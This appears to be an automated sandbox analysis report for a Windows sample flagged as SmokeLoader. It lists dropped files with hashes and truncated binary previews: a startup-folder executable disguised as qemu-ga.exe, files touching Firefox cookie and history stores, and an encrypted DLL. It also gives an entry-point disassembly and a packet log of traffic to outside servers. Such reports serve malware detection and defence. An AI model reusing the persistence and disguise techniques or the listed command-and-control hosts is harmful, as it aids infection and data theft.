Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...O..e.....................F......@.............@..........................@...................@..............................P........,..........................................................................................................CODE....d........................... ..`DATA....L...........................@...BSS.....L................................idata..P...........................@....tls.....................................rdata..............................@..P.reloc..............................@..P.rsrc....,.......,..................@..P.............@......................@..P........................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX\ClocX.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Mon Jan 14 14:48:34 2013, mtime=Wed Dec 27 15:58:14 2023, atime=Mon Jan 14 14:48:34 2013, length=2090496, window=hide
Category:	dropped
Size (bytes):	1072
Entropy (8bit):	4.578390321476144
Encrypted:	false
SSDEEP:
MD5:	22274B259AEA86BB75487EA5C3DED909
SHA1:	5DFA3370E1FFD3D285F68A3C67680E3958E9CD77
SHA-256:	E18E608E9FA05B428C7814833FA5658D079871705F1EEAC9976BF40415EBAF52
SHA-512:	63F0BF32303C0551D9222B6DCF9D32FD222B75C35EBF45A953553A1E9E918F801A23E7F625E6AAE3FFA4F1C9E6F853F2DDAAD8656ED74570D729658F3A099978
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... ......n.....s..8.....n...........................s....P.O. .:i.....+00.../C:\.....................1......WG...PROGRA~2.........O.I.WG.....................V.......".P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.7.....P.1......WV...ClocX.<......WG..WV.....U.........................C.l.o.c.X.....\.2......B.~ .ClocX.exe.D.......B.~.WH...............................C.l.o.c.X...e.x.e.......U...............-.......T...........P..z.....C:\Program Files (x86)\ClocX\ClocX.exe..>.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.l.o.c.X.\.C.l.o.c.X...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.l.o.c.X.........*................@Z\|...K.J.........`.......X.......192799...........hT..CrF.f4... ..,....,.......hT..CrF.f4... ..,....,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2..

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ClocX\Uninstall.lnk

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
Category:	dropped
Size (bytes):	810
Entropy (8bit):	3.3537650091445084
Encrypted:	false
SSDEEP:
MD5:	92B3A723185AB75B147F5AD78E324F08
SHA1:	C5779AD9CBA57A49105C8A3AEAD0F28FD1D9D823
SHA-256:	89641912FE45C436292AEA594747B94314E5E5EFDA4C670FE536178B01E54E91
SHA-512:	F458ADCCF1FA829D511F0C29980196DBA7C34EF3233DD23E676422F5505A0E9D52C5FB7406670D9150810D33B1176F0CE8E98302003FDB515862F68109B948C4
Malicious:	false
Reputation:	unknown
Preview:	L..................F........................................................Y....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".P.1...........ClocX.<............................................C.l.o.c.X.....`.2...........uninst.exe..F............................................u.n.i.n.s.t...e.x.e.......?.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.l.o.c.X.\.u.n.i.n.s.t...e.x.e...C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.l.o.c.X.........*................@Z\|...K.J.....................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.................

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\7D14.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	4608
Entropy (8bit):	3.790557976647158
Encrypted:	false
SSDEEP:
MD5:	A5CE3ABA68BDB438E98B1D0C70A3D95C
SHA1:	013F5AA9057BF0B3C0C24824DE9D075434501354
SHA-256:	9B860BE98A046EA97A7F67B006E0B1BC9AB7731DD2A0F3A9FD3D710F6C43278A
SHA-512:	7446F1256873B51A59B9D2D3498CEF5A41DBCE55864C2A5FB8CB7D25F7D6E6D8EA249D551A45B75D99B1AD0D6FB4B5E4544E5CA77BCD627717D6598B5F566A79
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....\..........."...0.............b&... ...@....@.. ....................................@..................................&..O....@.......................`.......%............................................... ............... ..H............text...h.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................D&......H.......l ..............................................................J ....(....(....&+...(....*.BSJB............v4.0.30319......l.......#~..0...`...#Strings............#US.........#GUID...........#Blob...........G..........3......................................................%...l.%...3.....E.....[.................S...........8.....r.....G.................Y...........".........................=.....P ........,...c ................T...................).....1.....9.....A.

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite-shm

Download File

Process:	C:\Users\user\AppData\Local\Temp\nsi4BEF.tmp.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Reputation:	unknown
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\jfhrjta

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	38227
Entropy (8bit):	6.916299761453295
Encrypted:	false
SSDEEP:
MD5:	C8159FA89113EC6FC180CCB76FF3BDC6
SHA1:	B7790FA8855C67A1B441B964910E2F1857A79C78
SHA-256:	BDF0D0149EE88A4B66F6535E6049FA2FAF1351A69C7DF0146B1FE6964E9C4AD6
SHA-512:	9DB519B90242B75B1D6C61247311D628F820341AA2DA4297BECAE3AF837E817D9DD87219FA09E58BD979A3F4D674A54216B1F0A6DB6002BBE1FF20FD62A9BA61
Malicious:	true
Yara Hits:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: C:\Users\user\AppData\Roaming\jfhrjta, Author: Joe Security
Reputation:	unknown
Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....{e...............H.............1............@..................................................................................................................................................................................................text............................... ...................................................................................................OT.8\4'..1.=.^.W'.;........3...V&....wB);..9...u.L...X.9~..;...kL.&.o0.y....J.~y.jv&.E;;{...^..._UIx.'.0....T..q......B...B...D...P..._u..x2..@y.#t..sL....3....c...@.....U.h.j....g...o]/.h).h...xv.jN...._.ru.}3g....>&p/...@.o_...i.....B..Y..z#B.....^K..#.AC.t.u.9..Wt.u..F......4$.....u.t...p.4$.......&..............K.......P.rV.<$................K.0...u.t.9l]....t$.u.t.8(ph_.U..VW......#}h......$............U4j_Y......{....O.9jTZ........?...._...X.!\....V.e......W

C:\Users\user\AppData\Roaming\jfhrjta:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	unknown
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\vghrjta

Download File

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	290304
Entropy (8bit):	6.72767352779887
Encrypted:	false
SSDEEP:
MD5:	2D24E3BAA2A16E47BEE10E91381E6391
SHA1:	013B59B2CD69E93694196DFB34FDDC8684CFD619
SHA-256:	FF2E975C649D66476C48AC9FE64455EB0727FEDE676D000728D09D62D2DC6DB4
SHA-512:	BE515895B29390E1C9C44620F7B18C8AE57D08627B8BBF7484B551CCF079011F95BAA78E71C1A2A6280B544DD06444B509B7C9BA126B525D813AFD68010B03E7
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........F..'r..'r..'r..u...'r..u.'r..u.3'r......'r..'s.?'r..u...'r..u.'r..u.'r.Rich.'r.................PE..L...:..c............................j.............@..................................Q......................................L...P........'..............................................................@............................................text............................... ..`.rdata...9.......:..................@..@.data....g...0...&..................@....zomoxolA............B..............@....rsrc....'.......(...F..............@..@................................................................................................................................................................................................................................................................................................................................

C:\Windows\Panther\UnattendGC\lua51.dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	15460352
Entropy (8bit):	7.999687813468816
Encrypted:	true
SSDEEP:
MD5:	2B98683A3E12E6D692D94222FAC1E440
SHA1:	5D1A5D2D40D1B061389ADD5F58DAA489B27A7382
SHA-256:	39696ACE9F9358426911911971427E16FFD86996F8110D19338A5BCB8F650074
SHA-512:	FE09CE6137F89C75B91B272FADF2FD0B684A43F59C55B53A2091B22C4DBA72872D9E1433D11B2F4AA345912A23EE2292BB8951AB4EE81A3A2F9848B029F6B1A2
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........jw...$...$...$.S.$...$.S.$...$.S.$...$...$...$...$...$...$...$...$...$.S.$...$.S.$...$.S.$...$Rich...$................PE..d....W.e.........." .....b...................................................@............@.........................................P...e.......<............................ ..x....................................................................................text....`.......b.................. ..`.rdata...8.......:...f..............@..@.data....9.......(..................@....pdata..............................@..@.rsrc...............................@..@.reloc..<.... ......................@..B........................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.916299761453295
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% VXD Driver (31/22) 0.00%
File name:	W73PCbSH71.exe
File size:	38'227 bytes
MD5:	c8159fa89113ec6fc180ccb76ff3bdc6
SHA1:	b7790fa8855c67a1b441b964910e2f1857a79c78
SHA256:	bdf0d0149ee88a4b66f6535e6049fa2faf1351a69c7df0146b1fe6964e9c4ad6
SHA512:	9db519b90242b75b1d6c61247311d628f820341aa2da4297becae3af837e817d9dd87219fa09e58bd979a3f4d674a54216b1f0a6db6002bbe1ff20fd62a9ba61
SSDEEP:	768:3E45SLnQpEhOB/hAGflc5xOXhr7gvexzv36:3E4EqEhOPNfqStgvexzv3
TLSH:	3D03D08A1C219A78FE1542F7169C8FD4533DD8CB61F3AF4D4A36893764CB7B482342A9
File Content Preview:	MZ..............@.......@...............................................!..L.!This program cannot be run in DOS mode...$........PE..L.....{e...............H.............1............@........................................................................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x4031a2
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x657B1891 [Thu Dec 14 15:00:33 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	1
OS Version Minor:	0
File Version Major:	1
File Version Minor:	0
Subsystem Version Major:	1
Subsystem Version Minor:	0
Import Hash:

Entrypoint Preview

Instruction
call 00007FF144D65385h
jne 00007FF144D65388h
je 00007FF144D65386h
jnp 00007FF144D65328h
and dword ptr [ecx-74FB3B7Dh], ecx
pop esp
and al, FCh
jmp 00007FF144D6538Ch
add al, 81h
jmp 00007FF144D65329h
xor dword ptr [eax], eax
add bl, ch
add eax, 04F5EB20h
and byte ptr [edi+eax+75h], dh
add eax, B1D340C7h
rol bh, 1
inc esp
and al, FCh
xor byte ptr [eax], al
add byte ptr [eax], al
sub esp, 04h
jne 00007FF144D65388h
je 00007FF144D65386h
int3
dec esi
xchg eax, esi
add eax, dword ptr [ebx+548B04C4h]
and al, FCh
jmp 00007FF144D65388h
add al, 29h
shr bl, 00000005h
add ch, bl
stc
add al, 02h
jmp 00007FF144D65387h
or byte ptr [edx], cl
loop 00007FF144D653CDh
mov byte ptr [ebx+eax+02h], ah
je 00007FF144D65387h
jne 00007FF144D65385h
mov cl, B5h
dec edi
push dword ptr [eax+000000A4h]
jne 00007FF144D65388h
je 00007FF144D65386h
jnl 00007FF144D65385h
out 32h, al
mov ecx, dword ptr [esp]
add esp, 04h
jmp 00007FF144D65388h
aam E1h
dec ebx
mov byte ptr [eax+06F98080h], dl
jl 00007FF144D653ECh
jmp 00007FF144D6538Dh
mov ebx, FB3D8D8Fh
push eax
pop esi
jmp 00007FF144D65387h
in eax, 96h
jmp 00007FF144D6537Ah
cld
jmp 00007FF144D65388h
leave
loope 00007FF144D653CDh
mov al, cl
mov byte ptr [edi], cl
mov dh, 48h
add ch, bl
add eax, 4BE1BC8Ch
mov byte ptr [ebx+0DEB01C1h], al
in al, 2Dh
mov ebx, 512B3AE8h
xchg eax, ecx
pop ecx
jmp 00007FF144D65387h
pop ebx
xor ch, bl
test ebp, 07E50FEBh
sbb byte ptr [edx-15h], cl
mov ecx, 00003159h

Data Directories

Name	Virtual Address	Virtual Size
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x0	0x0
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8ffe	0x9000	False	0.7551540798611112	data	7.070222172340171	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 27, 2023 17:57:17.781574965 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.069554090 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.069662094 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.069983006 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.070051908 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.357767105 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.357784986 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.368644953 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.373322964 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.373372078 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.661257029 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.661295891 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.670888901 CET	80	49735	185.215.113.68	192.168.2.4
Dec 27, 2023 17:57:18.714394093 CET	49735	80	192.168.2.4	185.215.113.68
Dec 27, 2023 17:57:18.797735929 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:18.797765970 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:18.797830105 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:18.798391104 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:18.798403025 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.278686047 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.278764009 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.283149958 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.283164024 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.283394098 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.308707952 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.348738909 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.667706013 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.667798042 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.667819977 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.667854071 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.669490099 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.669512987 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.669536114 CET	49736	443	192.168.2.4	104.192.141.1
Dec 27, 2023 17:57:19.669542074 CET	443	49736	104.192.141.1	192.168.2.4
Dec 27, 2023 17:57:19.800913095 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:19.800949097 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:19.801012039 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:19.801620960 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:19.801634073 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.286147118 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.286276102 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.288467884 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.288480043 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.288733006 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.289455891 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.332736969 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.490782976 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.491023064 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.491041899 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.491074085 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.491096020 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.491112947 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.491157055 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.648688078 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.648880005 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.648895979 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.648947001 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.648962975 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.648993015 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.649163961 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.649183989 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.649214029 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.649223089 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.649229050 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.649256945 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.698756933 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.806785107 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.806807041 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.806854010 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.806953907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.806972980 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.807040930 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.807065010 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.807079077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.807089090 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.807106018 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.807152033 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.807193041 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.807199001 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.855001926 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.964771986 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.964788914 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.964832067 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.964870930 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.964895010 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.964910984 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.964975119 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965007067 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965040922 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965046883 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965100050 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965395927 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965429068 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965457916 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965462923 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965470076 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965502024 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965506077 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965528965 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965538025 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965544939 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965578079 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965586901 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965617895 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965621948 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965646029 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965660095 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965693951 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965699911 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965729952 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.965977907 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.965998888 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966048956 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966057062 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966070890 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966166973 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966196060 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966214895 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966244936 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966259956 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966264963 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966278076 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966314077 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966427088 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966444016 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966463089 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966483116 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966499090 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966500998 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966511965 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:20.966545105 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966545105 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966614008 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:20.966675997 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.122677088 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.122697115 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.122730017 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.122816086 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.122843981 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.122859001 CET	49737	443	192.168.2.4	52.217.163.105
Dec 27, 2023 17:57:21.123053074 CET	443	49737	52.217.163.105	192.168.2.4
Dec 27, 2023 17:57:21.123078108 CET	443	49737	52.217.163.105	192.168.2.4
